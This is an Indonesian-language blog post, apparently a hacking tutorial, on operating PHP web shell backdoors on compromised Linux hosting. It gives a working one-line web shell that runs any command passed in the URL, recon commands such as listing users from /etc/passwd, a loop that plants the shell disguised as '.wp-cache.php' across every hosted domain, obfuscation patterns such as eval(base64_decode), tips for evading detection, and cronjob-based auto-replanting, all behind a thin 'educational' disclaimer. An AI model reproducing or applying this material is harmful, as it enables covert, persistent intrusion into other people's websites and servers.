💻 CMD di Shell Backdoor (Linux Hosting)
1. Akses Shell
Gunakan shell yang ada cmd-nya/gunakan uploader dengan fungsi seperti system(), exec(), shell_exec(), atau passthru().
<?php echo "<pre>"; system($_GET['cmd']); echo "</pre>"; ?>
Akses contoh:
http://target.com/shell.php?cmd=ls
2. Perintah CMD Penting dalam Webshell
Berikut ini adalah daftar perintah yang biasa digunakan dalam shell backdoor (Linux):
🗂️ Navigasi & File Management
| Fungsi | Perintah |
|---|---|
| Lihat isi direktori | ls -la |
| Lihat isi per baris | ls -1 |
| Masuk folder | cd /path/folder |
| Lihat path aktif | pwd |
| Kembali ke folder sebelumnya | cd .. |
| Buat folder | mkdir folder |
| Hapus file | rm file.php |
| Hapus folder dan isi | rm -rf folder/ |
| Salin file | cp file1.php file2.php |
| Pindah file | mv file.php /tujuan/ |
| Rename file | mv lama.php baru.php |
| Cari file | find / -name "file.php" |
| Cari file .php | find / -name "*.php" 2>/dev/null |
| Cari folder | find / -type d -name "target" |
| Ubah permission | chmod 755 file.php |
| Lihat permission | ls -l file.php |
👤 Informasi User & Sistem
| Fungsi | Perintah |
|---|---|
| Cek user aktif | whoami |
| Lihat semua user | cut -d: -f1 /etc/passwd |
| Cek UID | id |
| Info OS | uname -a |
| Info distro | cat /etc/*release |
| Info CPU | lscpu |
| Info memori | free -h |
| Info disk | df -h |
⚙️ Proses, Network & Cronjob
| Fungsi | Perintah |
|---|---|
| Lihat proses aktif | ps aux |
| Cek port aktif | netstat -tnlp |
| List cron | crontab -l |
| Edit cron | crontab -e |
| Semua cron | cat /etc/crontab |
🌐 Networking & Download
| Fungsi | Perintah |
|---|---|
| Download file | wget http://site.com/file.php |
| Download curl | curl -O http://site.com/file.php |
| Ping | ping -c 4 google.com |
| Cek IP | curl ifconfig.me |
🔁 Looping Shell
for i in /home/USERNAME/domains/*; do cp /tmp/shell.php "$i/public_html/.wp-cache.php" done
🧠 Obfuscation Command
eval(base64_decode(...))call_user_func("system", "ls")assert($_GET['cmd']);($f='system')&&$f($_GET['x']);
3. Tips Hindari Deteksi
- Gunakan nama file:
.index_.php,sess_handler.php,.cache.php - Gunakan header PHP palsu:
header("X-Powered-By: PHP/8.1.12"); - Gunakan function chaining:
call_user_func(),assert(),base64_decode()
4. Path Hosting Umum
/home/(user)/domains/domain.com/public_html/
5. Tips Pro
- Gunakan cronjob untuk auto-replant shell
- Buat script untuk cek online/offline shell
- Simpan list shell dalam
shell_list.txt
Author: Nyx6st
⚠️ Disclaimer
This article is intended solely for educational purposes only. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this.
"Where creativity, exploitation, and expression collide." — 6ickZone
Posting Komentar